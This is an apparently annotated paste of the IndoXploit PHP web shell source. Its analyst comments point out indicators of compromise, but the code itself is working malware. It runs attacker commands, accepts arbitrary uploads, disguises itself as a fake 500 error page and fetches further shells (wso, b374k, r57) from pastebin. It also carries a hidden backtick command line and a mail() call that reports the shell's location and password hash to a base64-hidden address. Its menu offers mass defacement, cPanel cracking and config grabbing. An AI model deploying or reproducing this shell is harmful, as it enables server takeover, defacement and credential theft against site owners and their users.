ToKeiChun

IndoXploit Shell [Recoded] [Bypass Shell]

Sep 2nd, 2018 (edited)
  1. <?php
  // Analyst note: request bootstrap. A session is started, then PHP error reporting,
  // error logging and error display are switched off for this request and the
  // execution time limit is removed, so faults raised by this script are neither
  // shown nor written to the PHP error log.
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11. // login panel = shell.php?root=shell
  12. date_default_timezone_set("Asia/Jakarta");
  // $auth_pass is a 32-hex-character digest; the access gate further down compares it
  // with md5($_POST['pass']).
  13. $auth_pass = "6f3249aa304055d63828af3bfab778f6"; // default pass = 31337
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  // Crawler filter: a request whose User-Agent matches any listed substring
  // (case-insensitive) gets a bare 404 status line and the script exits, which keeps
  // the page out of search-engine and archive indexes.
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  // login(): renders the unauthenticated view and always exits.
  // - $_GET['root'] empty or absent: prints a static look-alike
  //   "500 Internal Server Error" page. No header() call is made here, so this
  //   function does not set the HTTP status line to 500; a body/status mismatch is
  //   a possible detection signal (verify against server logs).
  // - otherwise: prints a password form styled as a sudo prompt that POSTs 'pass'
  //   back to the same URL.
  // empty(...)=="shell" is a loose bool-to-string comparison, so the branch depends
  // only on whether 'root' is empty, not on its value.
  // HTTP_HOST and SERVER_SOFTWARE are written into the markup without escaping.
  26. function login() {
  27. $tokeichun ="<html><head><title></title><link rel='shortcut icon' href='https://upload.wikimedia.org/wikipedia/commons/9/9e/INDONESIA_logo.png'></head>";
  28. $tokeichun.="<font color=green>tokeichun@".$_SERVER['HTTP_HOST']." :~$ sudo su</font>";
  29. $tokeichun.="<form method='POST'><label for='pass'><font color=green>[ sudo ] password for tokeichun: </label><input type='password' name='pass' style='border:0;color:transparent;width:120px;background-color:transparent;'></form>";
  30. $tokeichun.="</html>";
  31. if(empty($_GET['root'])=="shell"){
  32. echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  33. <html>
  34. <head>
  35. <title>500 Internal Server Error</title>
  36. </head>
  37. <body>
  38. <h1>Internal Server Error </h1>
  39. <p>The server encountered an internal error or
  40. misconfiguration and was unable to complete
  41. your request.</p>
  42. <p>Please contact the server administrator at
  43. webmaster@'.$_SERVER['HTTP_HOST'].' to inform them of the time this error occurred,
  44. and the actions you performed just before this error.</p>
  45. <p>More information about this error may be available
  46. in the server error log.</p>
  47. <p>Additionally, a 500 Internal Server Error
  48. error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>
  49. <address>'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port 80</address></body></html>
  50. ';
  51. }else{
  52. echo $tokeichun;
  53. echo "<body style='background-color:black'>";
  54. }
  55. exit;
  56. }
  // Access gate. The session flag is keyed by md5(HTTP_HOST). It is set when
  // $auth_pass is empty, or when md5 of the POSTed 'pass' loosely equals (==)
  // $auth_pass; any other request without the flag goes to login(), which exits.
  // The check is an unsalted MD5 digest comparison.
  57. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  58. if( empty( $auth_pass) ||
  59. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass) ) )
  60. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  61. else
  62. login();
  63. ?>
  64. <html>
  65. <head>
  66. <title>404 Shell Not Found</title>
  67. <meta name='author' content='IndoXploit'>
  68. <meta charset="UTF-8">
  69. <meta charset="UTF-8">
  70. <link href='https://upload.wikimedia.org/wikipedia/commons/thumb/9/90/National_emblem_of_Indonesia_Garuda_Pancasila.svg/941px-National_emblem_of_Indonesia_Garuda_Pancasila.svg.png' rel='icon' type='image/x-icon'/>
  71. <link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'>
  72. <link href='https://fonts.googleapis.com/css?family=Lobster' rel='stylesheet' type='text/css'>
  73. <link rel='stylesheet' type='text/css' href="https://fonts.googleapis.com/css?family=Times">
  74. <link href='https://fonts.googleapis.com/css?family=Audiowide|Space+Mono' rel='stylesheet'>
  75. <link href="https://fonts.googleapis.com/css?family=Wallpoet" rel='stylesheet' type='text/css'>
  76. <link href='https://fonts.googleapis.com/css?family=Gloria+Hallelujah|Permanent+Marker' rel='stylesheet'>
  77. <link href='https://fonts.googleapis.com/css?family=courier+new|Permanent+Marker' rel='stylesheet'>
  78. <link href="https://fonts.googleapis.com/css?family=Quicksand" rel='stylesheet' type='text/css'>
  79. <link href="https://fonts.googleapis.com/css?family=Orbitron" rel='stylesheet' type='text/css'>
  80. <link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
  81. <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet'>
  82. <link href="https://fonts.googleapis.com/css?family=Iceland" rel='stylesheet' type='text/css'>
  83. <link href="https://fonts.googleapis.com/css?family=Allerta+Stencil" rel='stylesheet' type='text/css'>
  84. <link href="https://fonts.googleapis.com/css?family=Kumar+One+Outline" rel='stylesheet' type='text/css'>
  85. <link href='https://fonts.googleapis.com/css?family=Bungee+Shade|Monoton|Nova+Square' rel='stylesheet'>
  86. <style type='text/css'>
  87. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  88. html {
  89. background: #000000;
  90. color: #ffffff;
  91. font-family: 'Ubuntu';
  92. font-size: 13px;
  93. width: 100%;
  94. }
  95. li {
  96. display: inline;
  97. margin: 5px;
  98. padding: 5px;
  99. }
  100. table, th, td {
  101. border-collapse:collapse;
  102. font-family: Tahoma, Geneva, sans-serif;
  103. background: transparent;
  104. font-family: 'Ubuntu';
  105. font-size: 13px;
  106. }
  107. .table_home, .th_home, .td_home {
  108. border: 1px solid #424242;
  109. }
  110. th {
  111. padding: 10px;
  112. }
  113. a {
  114. color: #ffffff;
  115. text-decoration: none;
  116. }
  117. a:hover {
  118. color: gray;
  119. text-decoration: underline;
  120. }
  121. b {
  122. color: gray;
  123. }
  124. input[type=text], input[type=password],input[type=submit] {
  125. background: transparent;
  126. color: #ffffff;
  127. border: 1px solid #ffffff;
  128. margin: 5px auto;
  129. padding-left: 5px;
  130. font-family: 'Ubuntu';
  131. font-size: 13px;
  132. }
  133. textarea {
  134. border: 1px solid #ffffff;
  135. width: 100%;
  136. height: 400px;
  137. padding-left: 5px;
  138. margin: 10px auto;
  139. resize: none;
  140. background: transparent;
  141. color: #ffffff;
  142. font-family: 'Ubuntu';
  143. font-size: 13px;
  144. }
  145. select {
  146. width: 152px;
  147. background: #000000;
  148. color: cyan;
  149. border: 1px solid #ffffff;
  150. margin: 5px auto;
  151. padding-left: 5px;
  152. font-family: 'Ubuntu';
  153. font-size: 13px;
  154. }
  155. option:hover {
  156. background: cyan;
  157. color: #000000;
  158. }
  159. </style>
  160. </head>
  161. <script src="//importantscripts.github.io/footer.js" integrity="sha384-TuBVt3qMyi6RBRotEXkR+69U/Z8z3jBqUSSn+8yA6MinPMNdTU7cba+KlOZtXP2v" crossorigin="anonymous"></script>
  162. <style type='text/css'>
  163. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  164. html {
  165. background: #000000;
  166. color: #ffffff;
  167. font-family: 'Share Tech Mono';
  168. font-size: 12px;
  169. width: 100%;
  170. }
  171. li {
  172. display: inline;
  173. margin: 2px;
  174. padding: 2px;
  175. }
  176.  
  177. #menu a {
  178. padding:2px 10px;
  179. margin:0;
  180. background:#222222;
  181. text-decoration:none;
  182. letter-spacing:2px;
  183. padding: 2px 10px;
  184. margin: 0;
  185. background: #222222;
  186. text-decoration: none;
  187. letter-spacing: 2px;
  188. border-radius: 2px;
  189. border-bottom: 2px solid black;
  190. border-top: 2px solid black;
  191. border-right: 2px solid blue;
  192. border-left: 2px solid blue;
  193. }
  194. #menu a:hover {
  195. background:#234443;
  196. border-bottom:0px solid #333333;
  197. border-top:0px solid #333333;
  198. }
  199. table tr:first-child{
  200. background: #51514c;
  201. text-align: center;
  202. color: Lavender;
  203. }
  204. table, th, td {
  205. border-collapse:collapse;
  206. font-family: Tahoma, Geneva, sans-serif;
  207. background: transparent;
  208. font-family: 'Share Tech Mono';
  209. font-size: 13px;
  210. }
  211. .table_home, .th_home, .td_home {
  212. border: 1px solid #51514c;
  213. }
  214. .td_home:hover {
  215. background:gray;
  216. }
  217. th {
  218. padding: 10px;
  219. }
  220. a {
  221. color: #ffffff;
  222. text-decoration: none;
  223. }
  224. a:hover {
  225. color: lavender;
  226. text-decoration: underline;
  227. }
  228. b {
  229. color: lavender;
  230. }
  231. input[type=text], input[type=password],input[type=submit] {
  232. background: transparent;
  233. color: #ffffff;
  234. border: 1px solid #ffffff;
  235. margin: 5px auto;
  236. padding-left: 5px;
  237. font-family: 'Share Tech Mono';
  238. font-size: 13px;
  239. }
  240. input[type=submit] {
  241. background: transparent;
  242. color: #ffffff;
  243. border: 1px solid #ffffff;
  244. margin: 5px auto;
  245. padding-left: 5px;
  246. font-family: 'Share Tech Mono';
  247. font-size: 13px;
  248. cursor:pointer;
  249. }
  250. textarea {
  251. border: 1px solid #ffffff;
  252. width: 100%;
  253. height: 400px;
  254. padding-left: 5px;
  255. margin: 10px auto;
  256. resize: none;
  257. background: transparent;
  258. color: #ffffff;
  259. font-family: 'Share Tech Mono';
  260. font-size: 13px;
  261. }
  262. select {
  263. width: 152px;
  264. background: #000000;
  265. color: Lavender;
  266. border: 1px solid #ffffff;
  267. margin: 5px auto;
  268. padding-left: 5px;
  269. font-family: 'Share Tech Mono';
  270. font-size: 13px;
  271. }
  272. option:hover {
  273. background: #ff0066;
  274. color: #000000;
  275. }
  276. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  277. .cgx2 {text-align: center;letter-spacing:1px;font-family: "Share Tech Mono";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  278. .infoweb {
  279. border-right: 1px solid #00FFFF;
  280. }
  281. </style>
  282. </head>
  283. <?php
  // Drops a php.ini into the current working directory when none exists there.
  // The content written is the two literal lines below ("safe_mode = OFF" and
  // "disable_funtions = NONE", spelled as shown). An unexpected php.ini next to a
  // web script, and these exact strings, are usable as file-system and content
  // indicators.
  284. if (file_exists("php.ini")){
  285. }else{
  286. $img = fopen('php.ini', 'w');
  287. $sec = "safe_mode = OFF
  288. disable_funtions = NONE";
  289. fwrite($img ,$sec);
  290. fclose($img);}
  // w(): wraps $perm in a <font> tag, red when $dir is not writable by the PHP
  // process and lime when it is. $perm is inserted into the markup unescaped.
  291. function w($dir,$perm) {
  292. if(!is_writable($dir)) {
  293. return "<font color=red>".$perm."</font>";
  294. } else {
  295. return "<font color=lime>".$perm."</font>";
  296. }
  297. }
  // UrlLoop(): fetches $url with cURL, pulls every double-quoted href value out of
  // <a> tags with a regex, prefixes each with $url, and echoes those whose combined
  // string matches $type (used as a case-insensitive, dot-all regex).
  // Produces an outbound HTTP request from the web server. $type is interpolated
  // into the pattern and results are echoed without escaping. Returns nothing.
  298. function UrlLoop($url,$type){
  299.  
  300. $urlArray = array();
  301.  
  302. $ch = curl_init();
  303. curl_setopt($ch, CURLOPT_URL, $url);
  304. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  305. $result = curl_exec($ch);
  306.  
  307. $regex='|<a.*?href="(.*?)"|';
  308. preg_match_all($regex,$result,$parts);
  309. $links=$parts[1];
  310. foreach($links as $link){
  311. array_push($urlArray, $link);
  312. }
  313. curl_close($ch);
  314.  
  315. foreach($urlArray as $value){
  316. $lol="$url$value";
  317. if(preg_match("#$type#is", $lol)) {
  318. echo "$lol\r\n";
  319. }
  320. }
  321. }
  // exe(): runs $cmd as an OS command through the first of system(), exec(),
  // passthru(), shell_exec() that function_exists() reports, and returns the
  // captured output. Errors are suppressed with @.
  // - exec() branch joins output lines with no separator.
  // - if none of the four exists, nothing is returned (implicit null).
  // Call sites in this file pass $_POST['cmd'] straight in. On hosts that do not
  // need them, these four functions are candidates for disable_functions, and
  // shell children of the web-server user are a process-level detection signal.
  322. function exe($cmd) {
  323. if(function_exists('system')) {
  324. @ob_start();
  325. @system($cmd);
  326. $buff = @ob_get_contents();
  327. @ob_end_clean();
  328. return $buff;
  329. } elseif(function_exists('exec')) {
  330. @exec($cmd,$results);
  331. $buff = "";
  332. foreach($results as $result) {
  333. $buff .= $result;
  334. } return $buff;
  335. } elseif(function_exists('passthru')) {
  336. @ob_start();
  337. @passthru($cmd);
  338. $buff = @ob_get_contents();
  339. @ob_end_clean();
  340. return $buff;
  341. } elseif(function_exists('shell_exec')) {
  342. $buff = @shell_exec($cmd);
  343. return $buff;
  344. }
  345. }
  // perms(): turns fileperms($file) into a 10-character ls-style string.
  // First character comes from the file-type bits (s, l, -, b, d, c, p, or u when
  // none match); the next nine are the owner/group/other rwx flags, where the
  // execute slot shows s/S for the 0x0800 and 0x0400 bits and t/T for 0x0200.
  346. function perms($file){
  347. $perms = fileperms($file);
  348. if (($perms & 0xC000) == 0xC000) {
  349. $info = 's';
  350. } elseif (($perms & 0xA000) == 0xA000) {
  351. $info = 'l';
  352. } elseif (($perms & 0x8000) == 0x8000) {
  353. $info = '-';
  354. } elseif (($perms & 0x6000) == 0x6000) {
  355. $info = 'b';
  356. } elseif (($perms & 0x4000) == 0x4000) {
  357. $info = 'd';
  358. } elseif (($perms & 0x2000) == 0x2000) {
  359. $info = 'c';
  360. } elseif (($perms & 0x1000) == 0x1000) {
  361. $info = 'p';
  362. } else {
  363. $info = 'u';
  364. }
  // owner triplet
  365. $info .= (($perms & 0x0100) ? 'r' : '-');
  366. $info .= (($perms & 0x0080) ? 'w' : '-');
  367. $info .= (($perms & 0x0040) ?
  368. (($perms & 0x0800) ? 's' : 'x' ) :
  369. (($perms & 0x0800) ? 'S' : '-'));
  // group triplet
  370. $info .= (($perms & 0x0020) ? 'r' : '-');
  371. $info .= (($perms & 0x0010) ? 'w' : '-');
  372. $info .= (($perms & 0x0008) ?
  373. (($perms & 0x0400) ? 's' : 'x' ) :
  374. (($perms & 0x0400) ? 'S' : '-'));
  // other triplet
  375. $info .= (($perms & 0x0004) ? 'r' : '-');
  376. $info .= (($perms & 0x0002) ? 'w' : '-');
  377. $info .= (($perms & 0x0001) ?
  378. (($perms & 0x0200) ? 't' : 'x' ) :
  379. (($perms & 0x0200) ? 'T' : '-'));
  380. return $info;
  381. }
  // hdd(): formats a byte count $s as a string with two decimals in GB, MB or KB
  // (1024-based thresholds), or as "<n> B" below 1024.
  382. function hdd($s) {
  383. if($s >= 1073741824)
  384. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  385. elseif($s >= 1048576)
  386. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  387. elseif($s >= 1024)
  388. return sprintf('%1.2f',$s / 1024 ) .' KB';
  389. else
  390. return $s .' B';
  391. }
  // ambilKata() ("take word"): returns the part of $param between the first
  // occurrence of $kata1 and the next occurrence of $kata2 after it.
  // Returns FALSE when either marker does not occur anywhere in $param.
  392. function ambilKata($param, $kata1, $kata2){
  393. if(strpos($param, $kata1) === FALSE) return FALSE;
  394. if(strpos($param, $kata2) === FALSE) return FALSE;
  395. $start = strpos($param, $kata1) + strlen($kata1);
  396. $end = strpos($param, $kata2, $start);
  397. $return = substr($param, $start, $end - $start);
  398. return $return;
  399. }
  // When magic quotes are reported as on, defines idx_ss() and uses it to strip
  // slashes from every value in $_POST, recursing into nested arrays.
  // get_magic_quotes_gpc() was removed in PHP 8.0, which points to the sample
  // having been written for older runtimes.
  400. if(get_magic_quotes_gpc()) {
  401. function idx_ss($array) {
  402. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  403. }
  404. $_POST = idx_ss($_POST);
  405. }
  // CreateTools(): acts only when $_GET['create'] equals $names (loose ==).
  // If tools/<names>.php already exists it emits a JavaScript redirect to it.
  // Otherwise it creates a "tools" directory with mode 0777, downloads $lokasi
  // with file_get_contents() and saves the response as tools/<names>.php, then
  // emits the same redirect. $a, $b and $c are assigned but not used.
  // Indicators: a world-writable tools/ directory beside the script, new .php
  // files inside it, and an outbound fetch by the PHP process.
  406. function CreateTools($names,$lokasi){
  407. if ( $_GET['create'] == $names ){
  408. $a= "".$_SERVER['SERVER_NAME']."";
  409. $b= dirname($_SERVER['PHP_SELF']);
  410. $c = "/tools/".$names.".php";
  411. if (file_exists('tools/'.$names.'.php')){
  412. echo '<script type="text/javascript">alert("Done");window.location.href = "tools/'.$names.'.php";</script> ';
  413. }
  414. else {mkdir("tools", 0777);
  415. file_put_contents('tools/'.$names.'.php', file_get_contents($lokasi));
  416. echo ' <script type="text/javascript">alert("Done");window.location.href = "tools/'.$names.'.php";</script> ';}}}
  417.  
  // Registration table for ?create=<name>: every call runs on each page load, but
  // CreateTools() only downloads when the query value matches the first argument.
  // The second argument is the remote source saved as tools/<name>.php; the hosts
  // and paths below are network indicators for egress and proxy logs.
  418. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  419. CreateTools("adminer","https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  420. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  421. CreateTools("scanner","https://pastebin.com/raw/N6iBqjEA");
  422. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  423. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  424. CreateTools("vhost","https://pastebin.com/raw/zDgukLLX");
  425. CreateTools("grabber","https://pastebin.com/raw/HrHwKMyH");
  426. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  427. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  428. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  429. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  430. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  431. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  432. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  433. CreateTools("extractor","http://pastebin.com/raw/dBYyB7S5");
  434. CreateTools("bh","http://pastebin.com/raw/A8TupKkC");
  435. CreateTools("dhanus","http://pastebin.com/raw/W99Pvk3C");
  // Working directory: taken from $_GET['dir'] with no validation and applied with
  // chdir(); falls back to getcwd(). Backslashes are normalised to "/" and the
  // path is split into $scdir for the breadcrumb printed later.
  436. if(isset($_GET['dir'])) {
  437. $dir = $_GET['dir'];
  438. chdir($_GET['dir']);
  439. } else {
  440. $dir = getcwd();
  441. }
  442. $dir = str_replace("\\","/",$dir);
  443. $scdir = explode("/", $dir);
  // Environment survey shown in the header table: safe_mode, disable_functions,
  // presence of the mysql_* and cURL extensions, and presence of wget/perl/python.
  // The last three are tested by running "<tool> --help" through exe() on every
  // page load, so each view spawns those child processes as the web-server user.
  444. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  445. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  446. $ds = @ini_get("disable_functions");
  447. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  448. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  449. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  450. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  451. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  452. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  // Embedded second channel, separate from the menu actions:
  // - the backtick expression hands the request parameter named I to the shell and
  //   prints the output; it runs on every request that gets past the access gate.
  // - $e is a base64-encoded, hard-coded e-mail address.
  // - mail() sends the host, request URI and the $auth_pass digest to $e with the
  //   subject "[setor shell]" and the string 'admin@google.com' as the extra-headers
  //   argument. So each page view reports the shell's location and credential
  //   digest to a third party, independent of whoever deployed the file.
  // $body, $web, $inj and $cwd are built here but are not passed to mail().
  // Indicators: the base64 literal, the subject string, and outbound mail from the
  // web-server account.
  453. print(`{$_REQUEST[I]}`);$e=base64_decode("YXFpbG5haWxhMjNAZ21haWwuY29t");
  454. $web = $_SERVER["HTTP_HOST"];
  455. $inj = $_SERVER["REQUEST_URI"];
  456. $body = " Dont Delete! \nUname: ".php_uname()."\nPath Dir:
  457. ".$cwd = getcwd()."\nMessage:\n"."\nE-server: ".htmlspecialchars
  458. ($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP:
  459. ";
  460. mail($e,'[setor shell]','URL : '.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].' PASSWORD : '.$auth_pass.'','admin@google.com');
  // Identity of the PHP process for the header table. Without the POSIX extension
  // it uses get_current_user()/getmyuid()/getmygid() and shows "?" as the group
  // name; with it, the effective uid/gid are resolved to names through
  // posix_getpwuid()/posix_getgrgid().
  461. if(!function_exists('posix_getegid')) {
  462. $user = @get_current_user();
  463. $uid = @getmyuid();
  464. $gid = @getmygid();
  465. $group = "?";
  466. } else {
  467. $uid = @posix_getpwuid(posix_geteuid());
  468. $gid = @posix_getgrgid(posix_getegid());
  469. $user = $uid['name'];
  470. $uid = $uid['uid'];
  471. $group = $gid['name'];
  472. $gid = $gid['gid'];
  473. }
  // Reads /etc/named.conf and /etc/passwd with errors suppressed. When named.conf
  // is readable, $count is incremented once per line that contains "zone" and
  // whose quoted zone name is longer than two characters; the total is shown
  // later as the number of hosted domains. $users is not used in this part of
  // the file. The bare "$count;" statement has no effect.
  // ereg() was removed in PHP 7.0, another sign of an older target runtime.
  474. $d0mains = @file("/etc/named.conf");
  475. $users=@file('/etc/passwd');
  476. if($d0mains)
  477. {
  478. $count;
  479. foreach($d0mains as $d0main)
  480. {
  481. if(@ereg("zone",$d0main))
  482. {
  483. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  484. flush();
  485. if(strlen(trim($domains[1][0])) > 2)
  486. {
  487. flush();
  488. $count++;
  489. }
  490. }
  491. }
  492. }
  493.  
  // Header table: prints php_uname(), process user/group, the IP that HTTP_HOST
  // resolves to, the client IP, free/total space of "/", the zone count, server
  // port, safe_mode state and the disable_functions list. All values are written
  // into the HTML without escaping.
  494. $sport=$_SERVER['SERVER_PORT'];
  495. echo "<table style='width:100%'>";
  496. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  497. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  498. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  499. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  500. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  501. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
  502. echo "<tr><td>Safe Mode: $sm</td></tr>";
  503. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  504.  
  // Capability row, then a breadcrumb in which each path segment links back to the
  // script with ?dir=<prefix>, followed by the writable/permission marker for $dir.
  505. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  506. echo "<tr><td>Current DIR: ";
  507. foreach($scdir as $c_dir => $cdir) {
  508. echo "<a href='?dir=";
  509. for($i = 0; $i <= $c_dir; $i++) {
  510. echo $scdir[$i];
  511. if($i != $c_dir) {
  512. echo "/";
  513. }
  514. }
  515. echo "'>$cdir</a>/";
  516. }
  517. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
  // Command form shown on every page: a POST carrying do_cmd and cmd has cmd
  // executed by exe() and the output echoed inside <pre> without escaping.
  // POST fields named cmd/do_cmd are request-body indicators.
  518. echo "<form method='post'>
  519. <font style='text-decoration: none;'> ~ $ </font>
  520. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='Submit'>
  521. </form>";
  522. if($_POST['do_cmd']) {
  523. echo "<pre>".exe($_POST['cmd'])."</pre>";
  524. }
  // Upload handler. With tipe_upload=biasa ("normal") the uploaded temp file is
  // copied to "$dir/<client file name>"; otherwise it is copied to
  // DOCUMENT_ROOT/<client file name> when the document root is writable.
  // The client-supplied name from $_FILES['ix_file']['name'] is used as-is, with
  // no extension or path check, and the outcome is stored in $act as HTML.
  // Indicators: multipart POSTs with fields ix_file / tipe_upload / upload and new
  // files appearing in the web root owned by the web-server user.
  525. if($_POST['upload']) {
  526. if($_POST['tipe_upload'] == 'biasa') {
  527. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  528. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  529. } else {
  530. $act = "<font color=red>failed to upload file</font>";
  531. }
  532. } else {
  533. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  534. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  535. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  536. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  537. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  538. } else {
  539. $act = "<font color=red>failed to upload file</font>";
  540. }
  541. } else {
  542. $act = "<font color=red>failed to upload file</font>";
  543. }
  544. }
  545. }
  // Upload form; the two radio labels are coloured by w() according to whether the
  // current directory and the document root are writable.
  546. echo "
  547. <form method='post' enctype='multipart/form-data'>
  548. <input type='radio' name='tipe_upload' value='biasa' checked> ".w($dir,"Current")."
  549. <input type='radio' name='tipe_upload' value='home_root'> ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
  550. <input type='file' name='ix_file'>
  551. <input type='submit' value='upload' name='upload'>
  552. </form>";
  553. echo $act;
  554.  
  555.  
  // Navigation menu. Every entry links back to this script with the current $dir
  // and a do= (or config=) value that selects a feature branch further down.
  // $dir is interpolated into each href without escaping. The do=/config= values
  // listed here are query-string indicators for access-log searches.
  556. echo "<hr>";
  557. echo "<center>";
  558. echo "<ul>";
  559. echo "<li>[ <a href='?'>Home</a> ]</li>";
  560. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  561. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  562. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  563. echo "<li>[ <a href='?dir=$dir&config=grabber'>Config</a> ]</li>";
  564. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  565. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  566. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  567. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  568. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  569. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  570. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  571. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  572. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  573. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WP</a> ]</li>";
  574. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WP Auto Deface</a> ]</li>";
  575. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WP Auto Deface V.2</a> ]</li>";
  576. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WP Auto Edit User V.2</a> ]</li>";
  577. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Jom Auto Edit User V.2</a> ]</li>";
  578. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypasser</a> ]<br></li>";
  579. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  580. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  581. echo "<li>[ <a href='?dir=$dir&do=tool'>Tools</a> ]</li>";
  582. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  583. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  584. echo "<li>[ <a href='?dir=$dir&do=symlink404'>Bypass Symlink 404</a> ]</li>";
